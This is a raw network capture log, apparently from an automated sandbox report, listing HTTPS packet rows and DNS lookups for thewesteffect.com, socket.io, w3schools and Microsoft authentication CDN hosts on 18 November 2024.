                                          Nov 18, 2024 23:45:10.194768906 CET4435743613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.194818020 CET57436443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.194883108 CET57436443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.194883108 CET57436443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.194911003 CET4435743613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.194933891 CET4435743613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.196439981 CET57441443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.196501970 CET4435744113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.196594954 CET57441443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.196674109 CET57441443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.196691990 CET4435744113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.323517084 CET4435743713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.323688984 CET4435743713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.323765039 CET57437443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.323837996 CET57437443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.323837996 CET57437443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.323875904 CET4435743713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.323901892 CET4435743713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.326428890 CET57442443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.326469898 CET4435744213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.326550961 CET57442443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.326715946 CET57442443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.326733112 CET4435744213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.582408905 CET4435743813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.583736897 CET57438443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.583787918 CET4435743813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.584333897 CET57438443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.584347010 CET4435743813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.717175961 CET4435743813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.717215061 CET4435743813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.717271090 CET4435743813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.717276096 CET57438443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.717340946 CET57438443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.717499971 CET57438443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.717535019 CET4435743813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.717564106 CET57438443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.717578888 CET4435743813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.720182896 CET57443443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.720218897 CET4435744313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.720283985 CET57443443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.720398903 CET57443443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.720424891 CET4435744313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.800883055 CET4435743913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.801307917 CET57439443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.801383972 CET4435743913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.801903009 CET57439443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.801918983 CET4435743913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.907457113 CET4435744013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.913847923 CET57440443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.913858891 CET4435744013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.914463043 CET57440443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.914468050 CET4435744013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.945919037 CET4435743913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.945992947 CET4435743913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.946058035 CET57439443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.946206093 CET57439443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.946207047 CET57439443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.946247101 CET4435743913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.946274996 CET4435743913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.956181049 CET4435744113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.957761049 CET57441443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.957794905 CET4435744113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.958256960 CET57441443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.958271027 CET4435744113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.968987942 CET57444443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.969023943 CET4435744413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:10.969090939 CET57444443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.969263077 CET57444443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:10.969279051 CET4435744413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.048055887 CET4435744013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.048203945 CET4435744013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.048258066 CET57440443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.048336983 CET57440443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.048350096 CET4435744013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.048362970 CET57440443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.048367977 CET4435744013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.051125050 CET57445443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.051155090 CET4435744513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.051215887 CET57445443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.051361084 CET57445443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.051369905 CET4435744513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.065151930 CET4435744213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.065511942 CET57442443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.065530062 CET4435744213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.066108942 CET57442443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.066112995 CET4435744213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.097017050 CET4435744113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.097163916 CET4435744113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.097246885 CET57441443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.097409010 CET57441443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.097440958 CET4435744113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.097464085 CET57441443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.097481012 CET4435744113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.100194931 CET57446443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.100229025 CET4435744613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.100368977 CET57446443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.100467920 CET57446443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.100476027 CET4435744613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.200788975 CET4435744213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.200860977 CET4435744213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.201020956 CET4435744213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.201051950 CET57442443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.201086044 CET57442443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.201138973 CET57442443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.201153040 CET4435744213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.201189041 CET57442443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.201195002 CET4435744213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.203593969 CET57447443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.203613043 CET4435744713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.203680038 CET57447443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.203809977 CET57447443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.203814983 CET4435744713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.472626925 CET4435744313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.473095894 CET57443443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.473123074 CET4435744313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.473695993 CET57443443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.473707914 CET4435744313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.609174013 CET4435744313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.609266996 CET4435744313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.609339952 CET57443443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.609493971 CET57443443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.609493971 CET57443443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.609524012 CET4435744313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.609533072 CET4435744313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.612000942 CET57448443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.612065077 CET4435744813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.612144947 CET57448443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.612262011 CET57448443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.612277985 CET4435744813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.701704025 CET4435744413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.702075005 CET57444443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.702095985 CET4435744413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.702474117 CET57444443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.702478886 CET4435744413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.786755085 CET4435744513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.787081003 CET57445443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.787111998 CET4435744513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.787602901 CET57445443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.787611008 CET4435744513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.832895041 CET4435744413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.833070993 CET4435744413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.833113909 CET4435744413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.833138943 CET57444443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.833201885 CET57444443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.833201885 CET57444443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.833225012 CET57444443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.833240986 CET4435744413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.835619926 CET57449443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.835714102 CET4435744913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.835896015 CET57449443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.835961103 CET57449443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.835979939 CET4435744913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.855859995 CET4435744613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.856192112 CET57446443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.856211901 CET4435744613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.856615067 CET57446443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.856621981 CET4435744613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.919862032 CET4435744513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.922616959 CET4435744513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.922914982 CET57445443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.922944069 CET57445443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.922956944 CET4435744513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.925688028 CET57450443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.925769091 CET4435745013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.925841093 CET57450443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.925949097 CET57450443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.925966024 CET4435745013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.961519957 CET4435744713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.961836100 CET57447443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.961853027 CET4435744713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.962201118 CET57447443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.962204933 CET4435744713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.989981890 CET4435744613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.990124941 CET4435744613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.990175009 CET57446443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.990267992 CET57446443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.990267992 CET57446443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.990283966 CET4435744613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.990294933 CET4435744613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.992075920 CET57451443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.992110968 CET4435745113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:11.992374897 CET57451443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.992487907 CET57451443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:11.992506981 CET4435745113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.096966982 CET4435744713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.097347975 CET4435744713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.097409964 CET57447443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.097446918 CET57447443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.097469091 CET4435744713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.097480059 CET57447443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.097486973 CET4435744713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.099534035 CET57452443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.099600077 CET4435745213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.099683046 CET57452443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.099860907 CET57452443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.099878073 CET4435745213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.344162941 CET4435744813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.344697952 CET57448443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.344760895 CET4435744813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.345035076 CET57448443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.345048904 CET4435744813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.474376917 CET4435744813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.474450111 CET4435744813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.474519968 CET57448443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.474729061 CET57448443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.474729061 CET57448443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.474776983 CET4435744813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.474805117 CET4435744813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.477305889 CET57453443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.477406979 CET4435745313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.477667093 CET57453443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.477785110 CET57453443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.477804899 CET4435745313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.566500902 CET4435744913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.566973925 CET57449443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.567039967 CET4435744913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.567357063 CET57449443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.567374945 CET4435744913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.664354086 CET4435745013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.664746046 CET57450443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.664788961 CET4435745013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.665179014 CET57450443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.665186882 CET4435745013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.697494984 CET4435744913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.697691917 CET4435744913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.697798014 CET57449443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.697798014 CET57449443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.699994087 CET57449443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.700011969 CET4435744913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.700006962 CET57454443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.700069904 CET4435745413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:12.700144053 CET57454443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.700238943 CET57454443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:12.700267076 CET4435745413.107.246.45192.168.2.4
                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 18, 2024 23:43:50.241913080 CET53615641.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:50.277441978 CET53649801.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:51.523526907 CET53629051.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:52.197983980 CET5407053192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:52.198121071 CET4986553192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:52.340734005 CET53540701.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:52.497668982 CET53498651.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:54.458264112 CET6545453192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:54.458398104 CET5714153192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:54.465019941 CET53654541.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:54.465329885 CET53571411.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:54.711163044 CET5502353192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:54.711353064 CET5874653192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:54.721395969 CET53550231.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:54.721776009 CET53587461.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:55.207566977 CET5989153192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:55.207690001 CET5938653192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:55.485874891 CET53593861.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:55.485887051 CET53598911.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:56.184837103 CET5502353192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:56.184998035 CET6446953192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:56.189832926 CET5062753192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:56.190175056 CET5779953192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:56.192048073 CET53644691.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:56.192152023 CET53550231.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:56.197247028 CET53577991.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:56.205475092 CET53506271.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:56.229896069 CET6431353192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:56.230043888 CET5728453192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:56.236675978 CET53643131.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:56.237966061 CET53572841.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:56.329231024 CET53619721.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:57.511287928 CET5112753192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:57.511492968 CET6292253192.168.2.41.1.1.1
                                          Nov 18, 2024 23:43:57.518260956 CET53511271.1.1.1192.168.2.4
                                          Nov 18, 2024 23:43:57.518533945 CET53629221.1.1.1192.168.2.4
                                          Nov 18, 2024 23:44:07.465429068 CET138138192.168.2.4192.168.2.255
                                          Nov 18, 2024 23:44:07.776617050 CET53497401.1.1.1192.168.2.4
                                          Nov 18, 2024 23:44:08.480791092 CET53507641.1.1.1192.168.2.4
                                          Nov 18, 2024 23:44:27.544497013 CET53588431.1.1.1192.168.2.4
                                          Nov 18, 2024 23:44:49.716748953 CET53549451.1.1.1192.168.2.4
                                          Nov 18, 2024 23:44:49.871125937 CET53580101.1.1.1192.168.2.4
                                          TimestampSource IPDest IPChecksumCodeType
                                          Nov 18, 2024 23:43:52.497771025 CET192.168.2.41.1.1.1c22f(Port unreachable)Destination Unreachable
                                          Nov 18, 2024 23:43:56.261750937 CET192.168.2.41.1.1.1c2dc(Port unreachable)Destination Unreachable
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Nov 18, 2024 23:43:52.197983980 CET192.168.2.41.1.1.10x4ed0Standard query (0)thewesteffect.comA (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:52.198121071 CET192.168.2.41.1.1.10x559cStandard query (0)thewesteffect.com65IN (0x0001)false
                                          Nov 18, 2024 23:43:54.458264112 CET192.168.2.41.1.1.10xb529Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:54.458398104 CET192.168.2.41.1.1.10xb8e5Standard query (0)www.google.com65IN (0x0001)false
                                          Nov 18, 2024 23:43:54.711163044 CET192.168.2.41.1.1.10x32f0Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:54.711353064 CET192.168.2.41.1.1.10xb939Standard query (0)cdn.socket.io65IN (0x0001)false
                                          Nov 18, 2024 23:43:55.207566977 CET192.168.2.41.1.1.10xa697Standard query (0)thewesteffect.comA (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:55.207690001 CET192.168.2.41.1.1.10x9cdcStandard query (0)thewesteffect.com65IN (0x0001)false
                                          Nov 18, 2024 23:43:56.184837103 CET192.168.2.41.1.1.10x201dStandard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.184998035 CET192.168.2.41.1.1.10xb89dStandard query (0)www.w3schools.com65IN (0x0001)false
                                          Nov 18, 2024 23:43:56.189832926 CET192.168.2.41.1.1.10x6d6bStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.190175056 CET192.168.2.41.1.1.10x50a3Standard query (0)cdn.socket.io65IN (0x0001)false
                                          Nov 18, 2024 23:43:56.229896069 CET192.168.2.41.1.1.10x8d5bStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.230043888 CET192.168.2.41.1.1.10x993eStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                          Nov 18, 2024 23:43:57.511287928 CET192.168.2.41.1.1.10x529eStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:57.511492968 CET192.168.2.41.1.1.10x131cStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Nov 18, 2024 23:43:52.340734005 CET1.1.1.1192.168.2.40x4ed0No error (0)thewesteffect.com192.254.232.133A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:54.465019941 CET1.1.1.1192.168.2.40xb529No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:54.465329885 CET1.1.1.1192.168.2.40xb8e5No error (0)www.google.com65IN (0x0001)false
                                          Nov 18, 2024 23:43:54.721395969 CET1.1.1.1192.168.2.40x32f0No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:54.721395969 CET1.1.1.1192.168.2.40x32f0No error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.71A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:54.721395969 CET1.1.1.1192.168.2.40x32f0No error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.12A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:54.721395969 CET1.1.1.1192.168.2.40x32f0No error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.91A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:54.721395969 CET1.1.1.1192.168.2.40x32f0No error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.61A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:54.721776009 CET1.1.1.1192.168.2.40xb939No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:55.485887051 CET1.1.1.1192.168.2.40xa697No error (0)thewesteffect.com192.254.232.133A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.192048073 CET1.1.1.1192.168.2.40xb89dNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.192152023 CET1.1.1.1192.168.2.40x201dNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.192152023 CET1.1.1.1192.168.2.40x201dNo error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.197247028 CET1.1.1.1192.168.2.40x50a3No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.205475092 CET1.1.1.1192.168.2.40x6d6bNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.205475092 CET1.1.1.1192.168.2.40x6d6bNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.91A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.205475092 CET1.1.1.1192.168.2.40x6d6bNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.61A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.205475092 CET1.1.1.1192.168.2.40x6d6bNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.71A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.205475092 CET1.1.1.1192.168.2.40x6d6bNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.12A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.234956980 CET1.1.1.1192.168.2.40x892fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
